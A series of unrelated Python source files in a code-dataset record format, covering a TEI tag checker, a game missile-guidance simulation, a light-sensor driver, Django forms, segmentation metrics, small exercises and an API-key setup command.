import Log\n\n__date__ = \"29-11-2022\"\n__version__ = \"0.0.1\"\n__author__ = \"Marta Materni\"\n\n\ndef check_open_close_tag(text_path, tag_open, tag_close):\n text = open(text_path, \"r\").read()\n text = clean_text(text)\n ptr_op = f\"&{tag_open};\"\n ptr_cl = f\"&{tag_close};\"\n ptr = fr\"({ptr_op})|({ptr_cl})\"\n lst = []\n n = 0\n oc = 0\n err = False\n for m in re.finditer(ptr, text):\n s = m.group()\n x0 = m.start()\n x1 = m.end() + 50\n t = text[x0:x1]\n if s == ptr_op:\n n += 1\n if oc != 0:\n lst.append(f\"ERROR\\n\")\n err = True\n oc = 0\n lst.append(f\"\\n{n}\")\n oc += 1\n if s == ptr_cl:\n oc -= 1\n lst.append(t)\n\n log_path = text_path.replace(\".txt\", f\"_{tag_open}_{tag_close}.log\")\n if err:\n log_path = log_path.replace(\".log\", \"_ERR.log\")\n log = Log(\"w\").open(log_path, 1).log\n for x in lst:\n log(x)\n\n\ndef do_main(text_path, tag_open, tag_close):\n check_open_close_tag(text_path, tag_open, tag_close)\n\n\n# text_path = 
\"tr_gre_teimed_005.txt\"\n# tag_open = \"&chB;\"\n# tag_close = \"&chE;\"\n# do_main(text_path, tag_open, tag_close)\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n if len(sys.argv) == 1:\n print(\"release: %s %s\" % (__version__, __date__))\n parser.print_help()\n sys.exit(1)\n parser.add_argument('-t',\n dest=\"txt_path\",\n required=True,\n default=None,\n type=str,\n metavar=\"files match\",\n help=\"-t \")\n parser.add_argument('-o',\n dest=\"op\",\n required=True,\n metavar=\"\",\n help='-o ')\n parser.add_argument('-c',\n dest=\"cl\",\n required=True,\n metavar=\"\",\n help='-c ')\n args = parser.parse_args()\n do_main(args.txt_path, args.op, args.cl)\n","repo_name":"gmaterni/teimed","sub_path":"checkopenclose.py","file_name":"checkopenclose.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31003284959","text":"from local_embedder.DB_handler import serialize_document_to_database\nimport argparse\nimport os\nimport glob\nimport pypdfium2 as pdfium\nfrom tqdm import tqdm\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--dir\", help=\"Directory containing knowledge in pdfs\")\nargs = parser.parse_args()\n\ndef getAllText(pdf_path: str):\n pdf_doc = pdfium.PdfDocument(pdf_path)\n text = \"\"\n for page_num in range(len(pdf_doc)):\n text += pdf_doc.get_page(page_num).get_textpage().get_text_range()\n pdf_doc.close()\n return text\n\n\ndef main():\n # Your code here\n pdf_files = glob.glob(os.path.join(args.dir, \"**/*.pdf\"), recursive=True)\n for pdf in tqdm(pdf_files):\n pdf_text = getAllText(pdf)\n bookName = pdf.strip().split(os.sep)[-1][:-4]\n serialize_document_to_database(pdf_text, bookName)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"XccelerateOrg/VectorDB_Storage_Retrieval","sub_path":"make_knowledge_DB.py","file_name":"make_knowledge_DB.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7882880039","text":"from math import sin, cos, atan2, sqrt, acos, asin, pi\nfrom random import random, randint\n\nclass Missile():\n \"\"\" class for missile object\n \"\"\"\n def __init__(self, x, y, vx, vy, turn_speed, burn_duration, burn_acc, fps, guidance_mode=1):\n \"\"\" everything is in px and s\n plane_pos is needed to determine a init position close to the plane\n burn_duration in ticks\n turn_speed in deg/tick\n \"\"\"\n self.x = x\n self.y = y\n self.v =[vx, vy]\n self.burn_duration = burn_duration\n self.burn_acc = burn_acc\n self.burned = 0\n self.omega = turn_speed # deg/s\n self.turn_drag = -70 # px /s/s, max drag\n self.guidance_mode = guidance_mode\n self.fps = fps\n self.dt = 1.0/fps\n self.alive = True\n self.hit = False\n self.p_last = []\n self.m_last = []\n\n\n def pure_guidance(self, plane):\n \"\"\" (Plane) -> void\n worst way to guide a missile, aka\n points the missile directly at the plane\n *** + omega is clockwise - is ct clockwise\n \"\"\"\n x, y, vx, vy = plane.missile_tracking()\n vec_target = [x-self.x, y-self.y] # displacement vector\n vec_missile = [self.v[0], self.v[1]] # velocity vector\n dot_prod = vec_target[0] * vec_missile[0] + vec_target[1] * vec_missile[1]\n mag_prod = sqrt(vec_target[0]**2 + vec_target[1]**2) * sqrt(vec_missile[0]**2 + vec_missile[1]**2)\n cross_prod_k = vec_target[0] * vec_missile[1] - vec_missile[0] * vec_target[1]\n try:\n omega = acos(dot_prod/mag_prod)\n except 
ValueError:\n # due to floating point math, dot product can be > magnitude when they're perfectly aligned...\n omega = 0\n # this gets how much omega can be done and how much v will be bled\n turn_command, decel = self.calc_angle_drag(omega)\n # fixing omega using cross product..\n if cross_prod_k > 0:\n turn_command *= -1\n # steers missile\n self.turn(turn_command, decel)\n self.x += self.v[0] * self.dt\n self.y += self.v[1] * self.dt\n\n \n def proportional_guidance(self, plane):\n ''' the real beast of an algorithm\n normal accel = N * LOS rate * closing V\n accel is proportional to LOS rate and closing velocity\n N = navigational gain (3-5 according to wiki)\n '''\n if len(self.p_last) == 0 or len(self.m_last) == 0:\n # upon initialization\n self.p_last = [plane.x, plane.y]\n self.m_last = [self.x, self.y]\n self.pure_guidance(plane)\n else:\n x, y, vx, vy = plane.missile_tracking()\n # both vectors are of velocity\n V0 = [self.p_last[0]-self.m_last[0], self.p_last[1], self.m_last[1]]\n V1 = [x - self.x, y - self.y]\n self.p_last[0] = x\n self.p_last[1] = y\n self.m_last[0] = self.x\n self.m_last[1] = self.y\n dot_prod = V0[0] * V1[0] + V0[1] * V1[1]\n mag_prod = sqrt(V0[0]**2 + V0[1]**2) * sqrt(V1[0]**2 + V1[1]**2)\n cross_prod_k = V0[0] * V1[1] - V1[0] * V0[1]\n try:\n omega = acos(dot_prod/mag_prod)\n except ValueError:\n # due to floating point math, dot product can be > magnitude when they're perfectly aligned...\n omega = 0\n # fixing omega using cross product..\n if cross_prod_k > 0:\n omega *= -1\n rate_LOS = omega * self.dt\n print(rate_LOS)\n \n\n def calc_angle_drag(self, desired_omega):\n \"\"\" (float) -> float, float\n determines how much turn is possible according to what's desired\n and how much speed is kept after bleed(as a fraction of v)\n \"\"\"\n max_omega = (self.omega/180) * pi * self.dt\n if abs(desired_omega) >= max_omega:\n # missile cant turn fast enough, max omega commanded\n turn_commanded = max_omega\n decel = self.turn_drag\n else:\n # missile doesn't need max omega\n turn_commanded = desired_omega\n decel = (desired_omega/max_omega) * self.turn_drag\n return turn_commanded, decel\n\n\n def turn(self, turn, drag):\n \"\"\" (float, float) -> void\n actually steers the missile according to what's commanded\n DOES NOT move the missile\n ** also bleeds speed off the missile\n \"\"\"\n theta = atan2(self.v[1], self.v[0])\n self.v[0] += drag * cos(theta) * self.dt\n self.v[1] += drag * sin(theta) * self.dt\n vx = self.v[0]\n vy = self.v[1]\n # rotation matrix\n self.v[0] = vx * cos(turn) - vy * sin(turn)\n self.v[1] = vx * sin(turn) + vy * cos(turn)\n \n\n def move(self, plane):\n \"\"\" (Plane) -> void\n moves the missile forward according to a specific guidance\n does NOT return new coordinates\n \"\"\"\n if self.guidance_mode == 1:\n # -> pure guidance\n self.pure_guidance(plane)\n # self.proportional_guidance(plane)\n elif self.guidance_mode == 2:\n # TODO\n pass\n \n\n def pos(self):\n \"\"\" () -> tuple(int, int) \n this one will return the current position\n \"\"\"\n return (int(round(self.x)), int(round(self.y)))\n\n\n def get_angle(self):\n '''() -> float\n returns the angle to rotate the missile img\n '''\n ang = atan2(self.v[0], self.v[1])\n return ang * 180 / pi + 180\n\n\n def shift(self, shift_x, shift_y):\n \"\"\" (float, float) -> void\n same as in Plane class\n \"\"\"\n self.x += shift_x\n self.y += 
shift_y","repo_name":"Kompensator/AIM9X-Sidewinder","sub_path":"missile.py","file_name":"missile.py","file_ext":"py","file_size_in_byte":5803,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"12655316815","text":"import numpy as np\nfrom timeit import default_timer as timer\nfrom numba import vectorize\nimport time\n\n\n\n@vectorize(['float64(float64, float64)'], target='cuda')\ndef pow_gpu(a, b):\n c = a ** b\n return c\n\n\ndef gpu_loop():\n a = b = np.array(np.random.rand(1, 1, 1, 1), dtype=np.float64)\n pow_gpu(a, b)\n return \"Compatible\"\n\n\n\nif __name__ == '__main__':\n try:\n print(gpu_loop())\n except:\n print(\"Not Compatible\")","repo_name":"jross263/HCI-Group-Project","sub_path":"StressTest-GPU/checkGPU.py","file_name":"checkGPU.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13355617790","text":"from reader import InferReader\nfrom train import *\n\nif __name__ == '__main__':\n model = pp.Model(Net(is_infer=True), inputs=input_define)\n model.load(\"/Users/zhanghongji/PycharmProjects/CaptchaDataset/Classify_Module/output/final\")\n model.prepare()\n infer_reader = InferReader(DATA_PATH)\n result = model.predict(test_data=infer_reader)[0]\n\n img_list = infer_reader.get_names()\n img_index = 0\n for mini_batch in result:\n for sample in mini_batch:\n print(f\"{img_list[img_index]}的推理结果为:{sample}\")\n img_index += 1\n\n","repo_name":"GT-ZhangAcer/CaptchaDataset","sub_path":"Classify_Module/infer.py","file_name":"infer.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"72"} +{"seq_id":"12005296965","text":"def permute(nums):\n to_return = []\n def get_parm(arr, left, right):\n if left==right:\n tmp = []\n for item in arr:\n tmp.append(item)\n to_return.append(tmp)\n else:\n for i in range(left, right+1):\n arr[left], arr[i] = arr[i], arr[left]\n get_parm(arr, left+1, right)\n arr[left], arr[i] = arr[i], arr[left]\n get_parm(nums,0, len(nums)-1)\n return to_return\n\nprint(permute([1, 2, 3]))","repo_name":"Kontowicz/Daily-Interview-Pro","sub_path":"solutions/day_78.py","file_name":"day_78.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"578298017","text":"import numpy as np\n\nimport matplotlib\nmatplotlib.use(\"TkAgg\")\n\nimport matplotlib.pyplot as plt\nplt.rcParams[\"figure.figsize\"] = (10,10)\nplt.ion()\n\n\nclass Character(object):\n def __init__(self):\n super().__init__()\n self.geometry = []\n self.__angle = 0.0\n self.speed = 0.1\n self.pos = np.zeros((2,))\n self.dir = np.array([0,1])\n self.color = 'r'\n self.C = np.identity(3)\n self.R = np.identity(3)\n self.T = np.identity(3)\n\n\n def draw(self):\n x_values = [1,2,3,4]\n y_values = [5,5,5,5]\n for vec2d in self.geometry:\n x_values.append(vec2d[0])\n y_values.append(vec2d[1])\n plt.plot(x_values, y_values)\n\n def generate_geometry(self):\n pass\n\n\nclass Asteroid(Character):\n def __init__(self):\n super().__init__()\n\n def generate_geometry(self):\n self.geometry = []\n\n\nclass Player(Character):\n def __init__(self):\n super().__init__()\n\n def generate_geometry(self):\n self.geometry = np.array([\n [-1, 0],\n [1, 0],\n [0, 1],\n [-1, 0]\n ])\n\n\ncharacters = []\nplayer1 = 
Player()\ncharacters.append(player1)\ncharacters.append(Asteroid())\ncharacters.append(Asteroid())\n\nis_running = True\ndef press(event):\n global is_running, player\n print('press', event.key)\n if event.key == 'escape':\n is_running = False # quits app\n elif event.key == 'right':\n player.set_angle(player.get_angle() - 5)\n elif event.key == 'left':\n player.set_angle(player.get_angle() + 5)\n\nfig, _ = plt.subplots()\nfig.canvas.mpl_connect('key_press_event', press)\n\nwhile is_running:\n plt.clf()\n\n plt.xlim(-10, 10)\n plt.ylim(-10, 10)\n\n for character in characters: # polymorhism\n character.draw()\n\n plt.draw()\n plt.pause(1e-2)","repo_name":"reinisrozenbahs/Bakalaura_darbs","sub_path":"game_template.py","file_name":"game_template.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13599808008","text":"from typing import *\n\n\nclass Solution:\n def readBinaryWatch(self, turnedOn: int) -> List[str]:\n numbers = []\n for h in range(12):\n h_bin = bin(h)[2:]\n h_ones = h_bin.count('1')\n if turnedOn - h_ones >= 0:\n for min in range(60):\n min_bin = bin(min)[2:]\n min_ones = min_bin.count('1')\n if turnedOn - h_ones - min_ones == 0:\n numbers.append(f'{h}:{min:02}')\n return numbers\n\n\ns = Solution()\nprint(s.readBinaryWatch(1))\n","repo_name":"Alset-Nikolas/Algorithms-Letcode","sub_path":"Easy/2/401.BinaryWatch/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17701684190","text":"from django import forms\nfrom django.core.exceptions import ValidationError\n# from localflavor.br.forms import BRCPFField\n# from pycpfcnpj import cpfcnpj\nfrom . 
import models\n\n\nclass BookForm(forms.ModelForm):\n class Meta:\n model = models.Livro\n fields = (\n 'nome', 'genero', 'escritor', 'editora', 'data_pub'\n )\n\n\nclass ClienteForm(forms.ModelForm):\n class Meta:\n model = models.Cliente\n\n # cpf = BRCPFField()\n\n fields = (\n 'nome_completo', 'cpf', 'nascimento', 'telefone', 'email', 'endereco',\n )\n\n def clean_cpf(self):\n cpf = self.cleaned_data.get('cpf')\n if (len(cpf) != 11):\n raise ValidationError('CPF inválido', code='invalid')\n return cpf\n\n def clean_telefone(self):\n telefone = self.cleaned_data.get('telefone')\n if (len(telefone) != 11):\n raise ValidationError('Telefone inválido', code='invalid')\n return telefone\n\n\nclass RentForm(forms.ModelForm):\n class Meta:\n model = models.Cliente_Livro\n fields = (\n 'id_cliente',\n )\n","repo_name":"Shelainy/biblioteca","sub_path":"library/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27500549697","text":"# Code sourced from:\n# https://github.com/seanbechhofer/raspberrypi/blob/master/python/TSL2561.py\n# https://github.com/adafruit/Adafruit_CircuitPython_TSL2561/blob/0c205ed557cf03bad6ab73f10a4b132b40d47bd6/adafruit_tsl2561.py#L127\nimport time\nimport smbus\n\n_DEFAULT_ADDRESS = 0x39\n_COMMAND_BIT = 0x80\n\n_CONTROL_POWERON = 0x03\n_CONTROL_POWEROFF = 0x00\n\n_REGISTER_CONTROL = 0x00\n_REGISTER_TIMING = 0x01\n_REGISTER_CHAN0_LOW = 0x0C\n_REGISTER_CHAN1_LOW = 0x0E\n_GAIN_SCALE = (16, 1)\n_TIME_SCALE = (0.034, 0.252, 1)\n_CLIP_THRESHOLD = (4900, 37000, 65000)\n\nclass TSL2561:\n\n def __init__(self, bus, address = _DEFAULT_ADDRESS, pause = 1):\n self.bus = bus\n self.address = address\n self.pause = pause\n self.gain = 0\n self.integration_time = 2\n self.enable() # power on\n self.set_gain() # 1x gain preselected\n self.set_integration_time() # 402ms integration\n \n def enable(self):\n self.bus.write_byte_data(self.address, _COMMAND_BIT | _REGISTER_CONTROL, _CONTROL_POWERON)\n \n def disable(self):\n self.bus.write_byte_data(self.address, _COMMAND_BIT | _REGISTER_CONTROL, _CONTROL_POWEROFF)\n\n def set_gain(self, gain = 0):\n # 0x00(00) gain = 1x\n # 0x10(00) gain = 16x\n if (gain != self.gain):\n self.bus.write_byte_data(self.address, _COMMAND_BIT | _REGISTER_TIMING, gain<<4 | self.integration_time)\n self.gain = gain \n time.sleep(self.pause)\n \n def set_integration_time(self, integration_time = 2):\n # 0x00(00) integration time = 13.7ms\n # 0x01(01) integration time = 101ms\n # 0x02(02) integration time = 402ms\n if (integration_time != self.integration_time):\n self.bus.write_byte_data(self.address, _COMMAND_BIT | _REGISTER_TIMING, self.gain<<4 | integration_time)\n self.integration_time = integration_time\n time.sleep(self.pause)\n \n def read_broadband(self):\n low, high = self.bus.read_i2c_block_data(self.address, _COMMAND_BIT | _REGISTER_CHAN0_LOW, 0x02)\n return high << 8 | low\n\n def read_infrared(self):\n low, high = self.bus.read_i2c_block_data(self.address, _COMMAND_BIT | _REGISTER_CHAN1_LOW, 0x02)\n return high << 8 | low\n\n def read_lux(self):\n ch0, ch1 = self.read_broadband(), self.read_infrared()\n if ch0 == 0:\n return None\n if ch0 >= _CLIP_THRESHOLD[self.integration_time]:\n return None\n if ch1 >= _CLIP_THRESHOLD[self.integration_time]:\n return None\n ratio = ch1 / ch0\n if ratio >= 0 and ratio <= 0.50:\n lux = 0.0304 * ch0 - 0.062 * ch0 * ratio**1.4\n elif ratio <= 0.61:\n lux = 0.0224 * ch0 - 0.031 * ch1\n 
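# the remaining ratio bands follow the piecewise lux approximation from the TSL2561 datasheet\n        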
elif ratio <= 0.80:\n lux = 0.0128 * ch0 - 0.0153 * ch1\n elif ratio <= 1.30:\n lux = 0.00146 * ch0 - 0.00112 * ch1\n else:\n lux = 0.\n # Pretty sure the floating point math formula on pg. 23 of datasheet\n # is based on 16x gain and 402ms integration time. Need to scale\n # result for other settings.\n # Scale for gain.\n lux *= _GAIN_SCALE[self.gain]\n # Scale for integration time.\n lux /= _TIME_SCALE[self.integration_time]\n return lux \n\nif __name__ == \"__main__\":\n bus = smbus.SMBus(1)\n tsl=TSL2561(bus)\n tsl.set_gain(0)\n tsl.set_integration_time(0)\n test = tsl.read_lux()\n print(test)\n \n'''\nimport smbus\nimport time\n\n# Get I2C bus\nbus = smbus.SMBus(1)\n\ntsl2561Address = 0x39 # TSL2561 address, (57)\n# Select control register, 0x00(00) with command register, 0x80(128)\n# 0x03(03) Power ON mode\nbus.write_byte_data(0x39, 0x00 | 0x80, 0x03)\n# TSL2561 address, 0x39(57)\n# Select timing register, 0x01(01) with command register, 0x80(128)\n# 0x02(02) Nominal integration time = 402ms\nbus.write_byte_data(0x39, 0x01 | 0x80, 0x02)\n\ntime.sleep(0.5)\n\n# Read data back from 0x0C(12) with command register, 0x80(128), 2 bytes\n# ch0 LSB, ch0 MSB\ndata = bus.read_i2c_block_data(0x39, 0x0C | 0x80, 0x02)\n\n# Read data back from 0x0E(14) with command register, 0x80(128), 2 bytes\n# ch1 LSB, ch1 MSB\ndata1 = bus.read_i2c_block_data(0x39, 0x0E | 0x80, 0x02)\n\n# Convert the data\nprint(data[0],data[1])\nch0 = data[1] * 256 + data[0]\nch1 = data1[1] * 256 + data1[0]\n\n# Output data to screen\nprint ('Full Spectrum(IR + Visible) :{:.1f} lux'.format(ch0))\nprint ('Infrared Value :{:.1f} lux'.format(ch1))\nprint ('Visible Value :{:.1f} lux'.format(ch0 - ch1))\n'''","repo_name":"TzuHuanTai/RaspberryPi_Weather","sub_path":"tsl2561.py","file_name":"tsl2561.py","file_ext":"py","file_size_in_byte":4700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12005259305","text":"from collections import deque\n\nclass Node(object):\n def __init__(self, value, left=None, right=None):\n self.left = left\n self.right = right\n self.value = value\n def __str__(self):\n q = deque()\n q.append(self)\n result = ''\n while len(q):\n num = len(q)\n while num > 0:\n n = q.popleft()\n result += str(n.value)\n if n.left:\n q.append(n.left)\n if n.right:\n q.append(n.right)\n num = num - 1\n if len(q):\n result += \"\\n\"\n\n return result\ndef fullBinaryTree(node):\n if node == None:\n return None\n node.left = fullBinaryTree(node.left)\n node.right = fullBinaryTree(node.right)\n\n if node.left == None and node.right == None:\n return node\n\n if node.left == None:\n new = node.right\n tmp = node\n node = None\n del(tmp)\n return new\n\n if node.right == None:\n new = node.left\n tmp = node\n node = None\n del(tmp)\n return new\n return node\n\ntree = Node(1)\ntree.left = Node(2)\ntree.right = Node(3)\ntree.right.right = Node(4)\ntree.right.left = Node(9)\ntree.left.left = Node(0)\nprint(fullBinaryTree(tree))\n# 1\n# 03\n# 94","repo_name":"Kontowicz/Daily-Interview-Pro","sub_path":"solutions/day_64.py","file_name":"day_64.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31438758294","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 17 12:24:06 2023\n\n@author: andreasaspe\n\"\"\"\n\nimport os\nfrom os import listdir\nimport numpy as np\nfrom tqdm import tqdm\nimport nibabel as nib\nimport pandas as pd\nimport 
cv2\nfrom my_plotting_functions import *\nfrom my_data_utils import dice_score\nfrom my_data_utils import *\nfrom my_plotting_functions import *\n\n\n#######################################################\n#################### CONTROL PANEL ####################\n#######################################################\n#Define scans\nall_scans = 1\nlist_of_subjects = ['sub-verse558']\n\ndata_type = 'test'\n\n#HUSK AT GENNEMGÅ FIL FOR FLERE TING AT ÆNDRE\n#Define directories Titans\ndir_segmentations = '/scratch/s174197/data/Verse20/Predictions_from_titans/FULL_SEGMENTATIONS_batchnorm_beforeCCA_evenbetterrotation'\ndir_GT = '/scratch/s174197/data/Verse20/Predictions_from_titans/FULL_SEGMENTATIONS_batchnorm_GT'\ndir_data_stage3 = '/scratch/s174197/data/Verse20/VertebraeSegmentation/Verse20_'+data_type+'_prep_NOPADDING'\npredictions_dataframe_folder = '/scratch/s174197/data/Verse20/Predictions_dataframes_from_titans'\n\n#Define directories MAC\n# dir_segmentations = '/Users/andreasaspe/Documents/Data/Verse20/Predictions_segmentations'\n# dir_data_stage3 = '/Users/andreasaspe/Documents/Data/Verse20/VertebraeSegmentation/Verse20_'+data_type+'_prep_NOPADDING' #'/zhome/bb/f/127616/Documents/Thesis/Rawdata_training'\n# predictions_dataframe_folder = '/Users/andreasaspe/Documents/Data/Verse20/Predictions_dataframe'\n\n#######################################################\n#######################################################\n#######################################################\n\n#Convert directories\ndir_segmentations = os.path.join(dir_segmentations,data_type)\ndir_GT = os.path.join(dir_GT,data_type)\ndir_stage3_img = os.path.join(dir_data_stage3,'img')\ndir_predictions_dataframe_folder = os.path.join(predictions_dataframe_folder,data_type,'evenbetterrotation_before')\n\nif not os.path.exists(dir_predictions_dataframe_folder):\n os.makedirs(dir_predictions_dataframe_folder)\n\n\n#Define list of scans\nif all_scans:\n all_subjects = []\n for filename in listdir(dir_GT):\n subject = filename.split(\"_\")[0]\n #if subject.find('verse') != -1: #PLOTTER KUN VERSE. 
IKKE GL\n all_subjects.append(subject)\n all_subjects = np.unique(all_subjects)\n #Sorterer fil '.DS' fra\n all_subjects = all_subjects[all_subjects != '.DS']\n all_subjects = all_subjects.tolist()\nelse:\n all_subjects = list_of_subjects\n\n\n\nDSC_list = []\navg_DSC_list = []\nHausdorff_list = []\navg_Hausdorff_list = []\n\n\n\nfor counter, subject in enumerate(tqdm(all_subjects)):\n \n print()\n print()\n print(subject)\n print()\n print()\n \n #Define filenames\n # FOR MAC\n # filename_msk_GT = [f for f in listdir(dir_segmentations) if (f.startswith(subject) and f.endswith('GT.nii.gz'))][0]\n # filename_msk_pred = [f for f in listdir(dir_segmentations) if (f.startswith(subject) and f.endswith('PREDICTION.nii.gz'))][0]\n # filename_img = [f for f in listdir(dir_stage3_img) if (f.startswith(subject) and f.endswith('img.nii.gz'))][0]\n\n #TITANS\n filename_msk_GT = [f for f in listdir(dir_GT) if (f.startswith(subject) and f.endswith('GT.nii.gz'))][0]\n filename_msk_pred = [f for f in listdir(dir_segmentations) if (f.startswith(subject) and f.endswith('PREDICTIONbefore.nii.gz'))][0]\n filename_img = [f for f in listdir(dir_stage3_img) if (f.startswith(subject) and f.endswith('img.nii.gz'))][0]\n\n #Load Nifti files\n msk_nib_GT = nib.load(os.path.join(dir_GT,filename_msk_GT))\n msk_nib_pred = nib.load(os.path.join(dir_segmentations,filename_msk_pred))\n img_nib = nib.load(os.path.join(dir_stage3_img,filename_img))\n\n #Get data\n data_msk_GT = np.asanyarray(msk_nib_GT.dataobj, dtype=np.float32)\n data_msk_pred = np.asanyarray(msk_nib_pred.dataobj, dtype=np.float32)\n data_img = np.asanyarray(img_nib.dataobj, dtype=np.float32)\n \n \n v_numbers = np.unique(data_msk_pred)\n\n DSC_all = [np.nan,np.nan,np.nan,np.nan,np.nan,np.nan,np.nan,np.nan]\n Hausdorff_all = [np.nan,np.nan,np.nan,np.nan,np.nan,np.nan,np.nan,np.nan]\n\n \n for i in range(len(v_numbers)-1): #Fordi vi gider ikke have 0 med\n v_number = int(v_numbers[i+1]) #i+1 fordi vi ikke gider at have 0 med\n msk_GT = np.where(data_msk_GT == v_number,1,0)\n msk_pred = np.where(data_msk_pred == v_number,1,0)\n \n \n #Get indices to crop it tigthly\n x_indices_GT, y_indices_GT, z_indices_GT = np.where(msk_GT != 0)\n x_indices_pred, y_indices_pred, z_indices_pred = np.where(msk_pred != 0)\n \n # Calculate the bounding box coordinates\n x_min = np.min(np.concatenate((x_indices_GT,x_indices_pred)))\n x_max = np.max(np.concatenate((x_indices_GT,x_indices_pred)))\n y_min = np.min(np.concatenate((y_indices_GT,y_indices_pred)))\n y_max = np.max(np.concatenate((y_indices_GT,y_indices_pred)))\n z_min = np.min(np.concatenate((z_indices_GT,z_indices_pred)))\n z_max = np.max(np.concatenate((z_indices_GT,z_indices_pred)))\n \n #Crop\n msk_GT = msk_GT[x_min:x_max+1,y_min:y_max+1,z_min:z_max+1]\n msk_pred = msk_pred[x_min:x_max+1,y_min:y_max+1,z_min:z_max+1]\n \n #Find contours!\n \n contour_image_GT = find_3d_contours(msk_GT)\n contour_image_pred = find_3d_contours(msk_pred)\n \n DSC = dice_score(msk_GT,msk_pred)\n print(number_to_name[v_number])\n print(\"Dice is {:.2f}\".format(DSC))\n Hausdorff = hausdorff_distance_3d(contour_image_GT,contour_image_pred)\n print(\"Hausdorff dist is {:.2f}\".format(Hausdorff))\n \n \n DSC_all[abs(v_number-24)] = DSC #L5 er første plads i stedet for sidste\n Hausdorff_all[abs(v_number-24)] = Hausdorff\n \n print()\n \n DSC_list.append(DSC_all)\n avg_DSC_list.append(np.nanmean(DSC_all))\n Hausdorff_list.append(Hausdorff_all)\n avg_Hausdorff_list.append(np.nanmean(Hausdorff_all))\n\ncolumn_names = 
['L5','L4','L3','L2','L1','T12','T11','T10']\n\nDSC_dataframe = pd.DataFrame(DSC_list, columns=column_names)\nDSC_dataframe.insert(0, 'Average DSC', avg_DSC_list)\nDSC_dataframe.insert(0, 'subjects', all_subjects)\nDSC_dataframe.to_csv(os.path.join(dir_predictions_dataframe_folder,'df_DSC.csv'), index=False)\n\n\nHAUSDORFF_dataframe = pd.DataFrame(Hausdorff_list, columns=column_names)\nHAUSDORFF_dataframe.insert(0, 'Average distance', avg_Hausdorff_list)\nHAUSDORFF_dataframe.insert(0, 'subjects', all_subjects)\nHAUSDORFF_dataframe.to_csv(os.path.join(dir_predictions_dataframe_folder,'df_HAUSDORFF.csv'), index=False)\n","repo_name":"andreasaspe/Thesis_code","sub_path":"Other_scripts/Verse_predict_pipeline/Evaluate_metrics.py","file_name":"Evaluate_metrics.py","file_ext":"py","file_size_in_byte":6759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"5833681173","text":"from random import randint\nfrom time import sleep\ncomp = randint(0, 5)\nplayer = int(input('Guess the number I thought of, between 0 and 5: '))\nprint('PROCESSING...')\nsleep(2)\nif comp == player:\n    print('You got it, you rascal!!')\nelse:\n    print('WROOOONG!!')\nsleep(0.5)\nprint('I thought of the number {} and you chose {}'.format(comp, player))\n","repo_name":"othiagomanhaes/Python","sub_path":"Mundo 1/ex028.py","file_name":"ex028.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"6067864591","text":"lista = list()\npares = list()\nimpares = list()\n\nwhile True:\n    lista.append(int(input('Enter a number: ')))\n    resposta = input('Do you want to continue? [Y/N]: ')\n    if resposta in 'Nn':\n        break\nfor i, valor in enumerate(lista):\n    if valor % 2 == 0:\n        pares.append(valor)\n    else:\n        impares.append(valor)\nprint('-='*30)\nprint(f'The complete list is {lista}\\nThe even values are {pares}\\nThe odd values are {impares}')","repo_name":"Camilla-Carvalho/List-of-Algorithms","sub_path":"Estruturas de dados/Resoluções/82 -> Div valores em listas.py","file_name":"82 -> Div valores em listas.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
+{"seq_id":"40790118098","text":"import os\nimport errno\nimport configparser\nfrom .command import GeneralCommand, CommandError\nfrom .. 
import auth\n\n\nclass InitAuth(GeneralCommand):\n    \"\"\"Initialise auth\"\"\"\n\n    @classmethod\n    def add_parser(cls, parser, subparser):\n        p = subparser.add_parser(\n            \"init-auth\",\n            description=\"Store auth information \" \"locally %s\" % auth.CONFIG_FILE_PATH,\n        )\n        p.add_argument(\"key\", help=\"Your API Key\")\n        p.add_argument(\"secret\", help=\"Your API Secret\")\n\n        return \"init-auth\"\n\n    def execute(self):\n        key, secret = auth.read_from_file()\n        if key:\n            raise CommandError(\n                \"Authentication information already \"\n                \"exists in \" + auth.CONFIG_FILE_PATH\n            )\n\n        try:\n            os.mkdir(auth.CONFIG_DIR)\n            os.chmod(auth.CONFIG_DIR, 0o700)\n        except OSError as e:\n            if e.errno != errno.EEXIST:\n                raise CommandError(e)\n\n        # SafeConfigParser is a deprecated alias (removed in Python 3.12);\n        # ConfigParser is the supported spelling.\n        cfg = configparser.ConfigParser()\n        cfg.add_section(\"main\")\n        cfg.set(\"main\", \"key\", self.args.key)\n        cfg.set(\"main\", \"secret\", self.args.secret)\n\n        with open(auth.CONFIG_FILE_PATH, \"w\") as 